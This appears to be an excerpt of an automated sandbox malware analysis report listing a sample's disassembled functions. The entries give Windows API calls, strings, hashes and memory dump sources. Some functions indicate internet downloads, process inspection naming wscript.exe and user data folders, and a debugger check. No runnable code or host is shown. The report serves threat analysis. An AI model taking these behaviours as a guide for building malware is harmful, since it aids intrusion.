                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 949163717-0
                                                                                                                                                                                            • Opcode ID: 440f6a19ddd1844c697a9c8710c054bd71b70a8acab12fb92dde36598b6e05c8
                                                                                                                                                                                            • Instruction ID: 61996dddf9b32201c9d4f9128cb804046bbcaa7207d5ad7bd35bbc6d96dd5d33
                                                                                                                                                                                            • Opcode Fuzzy Hash: 440f6a19ddd1844c697a9c8710c054bd71b70a8acab12fb92dde36598b6e05c8
                                                                                                                                                                                            • Instruction Fuzzy Hash: E7516F75A0420AAFDB10DFB4DC45ABA7BBCFF58704F1444A9E910EB150E7719D48CB60
                                                                                                                                                                                            Function 00551434 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00551440
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0055150C
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0055152C
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00551536
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                            • Opcode ID: 1e1e4c772b3163a201d95e484868ca003b4ebc8605b90b58b9ca13cd9513283b
                                                                                                                                                                                            • Instruction ID: 6d5af0dd3d53e97d06441e8b4f58bde6f6c6552bf08b35ec74610b0a32e07000
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e1e4c772b3163a201d95e484868ca003b4ebc8605b90b58b9ca13cd9513283b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 96313A75D012189BDB20DFA4D9497CCBBB8BF48301F10409AE40DAB250EB709A88DF05
                                                                                                                                                                                            Function 00550782 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00550788
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00550796
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005507A7
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005507B8
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005507C9
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005507DA
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 005507EB
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 005507FC
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0055080D
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0055081E
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0055082F
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00550840
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00550851
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00550862
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00550873
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00550884
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00550895
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 005508A6
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 005508B7
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 005508C8
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 005508D9
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 005508EA
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 005508FB
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0055090C
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0055091D
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0055092E
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0055093F
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00550950
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00550961
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00550972
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00550983
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00550994
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 005509A5
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 005509B6
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 005509C7
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 005509D8
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 005509E9
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 005509FA
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00550A0B
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00550A1C
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00550A2D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                            • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                                                                                            • API String ID: 667068680-295688737
                                                                                                                                                                                            • Opcode ID: 865a371dcac076b4d1d27590b11a09389908cc4a5bf0c6a36042da00dd23ca63
                                                                                                                                                                                            • Instruction ID: 04d429c7bfe5c73faa052543cef3817836b7565d1e0cb73cf7b62e2ddb58803f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 865a371dcac076b4d1d27590b11a09389908cc4a5bf0c6a36042da00dd23ca63
                                                                                                                                                                                            • Instruction Fuzzy Hash: 14610E75952310EF97906BB8BE0E84A3EE8FA2D6157007516FA09E31E0D6F4B00DBF91
                                                                                                                                                                                            Function 005584EA Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 357COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$Info
                                                                                                                                                                                            • String ID: 0!W
                                                                                                                                                                                            • API String ID: 2509303402-2730159414
                                                                                                                                                                                            • Opcode ID: c81eec7c713a858439f49a1fe97104827893df8abb220a84e020e37b9b731ea7
                                                                                                                                                                                            • Instruction ID: 719ac22bd06c6b14894b5909f068964ca8ab17a555fea900dd57301001ef475e
                                                                                                                                                                                            • Opcode Fuzzy Hash: c81eec7c713a858439f49a1fe97104827893df8abb220a84e020e37b9b731ea7
                                                                                                                                                                                            • Instruction Fuzzy Hash: ACD18C71D003469FDB118FA8C895BBEBFF5FF48301F14456AE895AB282DB71A849CB50
                                                                                                                                                                                            Function 005329C0 Relevance: 28.3, APIs: 9, Strings: 7, Instructions: 311networkfileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00532BA1
                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000007,00000000,00000000,84000000,00000000), ref: 00532C1D
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00532C2A
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00532C98
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00532C9B
                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00002000,?), ref: 00532CC7
                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00002000,?), ref: 00532CFE
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00532D52
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00532D55
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Internet$CloseHandle$FileOpenRead
                                                                                                                                                                                            • String ID: ""~|fP$,V$33333333$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$sHM
                                                                                                                                                                                            • API String ID: 3539267403-3729596889
                                                                                                                                                                                            • Opcode ID: 744e0d3086687a5ffe00173b3f3508765a7f284d0bf758457be2f97d93eedccb
                                                                                                                                                                                            • Instruction ID: c715e586d27f767f29000507bdc943e2113d9b560d7e8e909b1264409609160f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 744e0d3086687a5ffe00173b3f3508765a7f284d0bf758457be2f97d93eedccb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 06B1F535D106089BDB02CB78DC46BE9B7B8BF66341F10876AF904B7151FB70AAC68B40
                                                                                                                                                                                            Function 0053BFD0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0053BFE5
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0053C000
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0053C020
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0053C071
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0053C167
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0053C17F
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0053C18D
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0053C192
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0053C197
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Concurrency::cancel_current_taskLockit::~_$Lockit::_$Facet_Register
                                                                                                                                                                                            • String ID: N#T$N#T$dV$false$true
                                                                                                                                                                                            • API String ID: 1941589060-4048706568
                                                                                                                                                                                            • Opcode ID: cde01a473f47941b9dd03a2abcbd20a3ae6fa6dab01d1863857de8fc7982be28
                                                                                                                                                                                            • Instruction ID: 5504db16eca0274ac66efa2d118c3390a2ecdf790b0d0d857d9bc94b64d473d2
                                                                                                                                                                                            • Opcode Fuzzy Hash: cde01a473f47941b9dd03a2abcbd20a3ae6fa6dab01d1863857de8fc7982be28
                                                                                                                                                                                            • Instruction Fuzzy Hash: FF51D335A01301DFCB24EFA8D859A9ABFA0BF54310F14446DEC09AB352EB71ED49DB81
                                                                                                                                                                                            Function 005313C0 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 332COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?), ref: 005313DD
                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,?), ref: 005313FB
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,?), ref: 00531405
                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,00000000,00000000,?,00000104,?,?), ref: 0053144A
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 00531455
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 0053175F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseHandle$Process$CurrentFileModuleNameOpen
                                                                                                                                                                                            • String ID: APPDATA$C:\ProgramData$C:\Windows\Microsoft.NET$LOCALAPPDATA$USERPROFILE$wscript.exe
                                                                                                                                                                                            • API String ID: 1772831937-2916873119
                                                                                                                                                                                            • Opcode ID: a469c25abaf6b9a0a42e4d88f5ec1e5255be694c7d284a3df74deb8752ef50a6
                                                                                                                                                                                            • Instruction ID: 81a527bbd3094fa1bf4f9290b55bf704fd2313607f989bb615c789d682520510
                                                                                                                                                                                            • Opcode Fuzzy Hash: a469c25abaf6b9a0a42e4d88f5ec1e5255be694c7d284a3df74deb8752ef50a6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EB12576E006049BDB10DBB8CC85BBEBF79FF90360F584168E816A7282D735ED468758
                                                                                                                                                                                            Function 00566A28 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 00566A6C
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565CF1
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D03
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D15
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D27
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D39
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D4B
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D5D
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D6F
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D81
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565D93
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565DA5
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565DB7
                                                                                                                                                                                              • Part of subcall function 00565CD4: _free.LIBCMT ref: 00565DC9
                                                                                                                                                                                            • _free.LIBCMT ref: 00566A61
                                                                                                                                                                                              • Part of subcall function 0055CE37: HeapFree.KERNEL32(00000000,00000000,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?), ref: 0055CE4D
                                                                                                                                                                                              • Part of subcall function 0055CE37: GetLastError.KERNEL32(?,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?,?), ref: 0055CE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 00566A83
                                                                                                                                                                                            • _free.LIBCMT ref: 00566A98
                                                                                                                                                                                            • _free.LIBCMT ref: 00566AA3
                                                                                                                                                                                            • _free.LIBCMT ref: 00566AC5
                                                                                                                                                                                            • _free.LIBCMT ref: 00566AD8
                                                                                                                                                                                            • _free.LIBCMT ref: 00566AE6
                                                                                                                                                                                            • _free.LIBCMT ref: 00566AF1
                                                                                                                                                                                            • _free.LIBCMT ref: 00566B29
                                                                                                                                                                                            • _free.LIBCMT ref: 00566B30
                                                                                                                                                                                            • _free.LIBCMT ref: 00566B4D
                                                                                                                                                                                            • _free.LIBCMT ref: 00566B65
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                            • Opcode ID: fcd598e0c64765ca8e5f994308a9811f3d669e002715af052879bf83ff775c3d
                                                                                                                                                                                            • Instruction ID: 3dee5d883313234914dfa8f11fd598e0f3022a28b5ff09f571966656e2eeb15f
                                                                                                                                                                                            • Opcode Fuzzy Hash: fcd598e0c64765ca8e5f994308a9811f3d669e002715af052879bf83ff775c3d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 48314B31600302DFEB21AA78E94AB5A7FE9FF40751F14842AE498E7161DF71BC44CB20
                                                                                                                                                                                            Function 00565DD2 Relevance: 18.4, APIs: 12, Instructions: 373COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                            • Opcode ID: a8e2ed7d33b8c294386bd28116111f91e8393b8346ce930f2e9ff11e975637b7
                                                                                                                                                                                            • Instruction ID: 2c94900c92a8d7f6d91b958572844682ad53082a49013ef4352b2175d0a3ab17
                                                                                                                                                                                            • Opcode Fuzzy Hash: a8e2ed7d33b8c294386bd28116111f91e8393b8346ce930f2e9ff11e975637b7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 14C14376E40605AFDB20DBA8CC56FEE7BF8BB48714F144165FA05EB282D670AE418B50
                                                                                                                                                                                            Function 00553CC8 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00553DC5
                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00553DE7
                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00553EF6
                                                                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00553FC8
                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0055404C
                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 00554067
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 2123188842-393685449
                                                                                                                                                                                            • Opcode ID: 712b5f3d7081adcf9441e666ad7d544e6442d8cf2041a31e8d9f8917eb329fb3
                                                                                                                                                                                            • Instruction ID: 272f7973783a89f6c938b694f14fc717628ad5c927d883884307764814d1c259
                                                                                                                                                                                            • Opcode Fuzzy Hash: 712b5f3d7081adcf9441e666ad7d544e6442d8cf2041a31e8d9f8917eb329fb3
                                                                                                                                                                                            • Instruction Fuzzy Hash: A8B19971C0020AEFCF25DFA4C8A99AEBFB5BF44352B14445AEC096B212D335DA59CF91
                                                                                                                                                                                            Function 005356B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146networkfileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005356F1
                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000100,00000000), ref: 0053575B
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00535768
                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 005357C9
                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 005357FB
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0053580C
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0053580F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
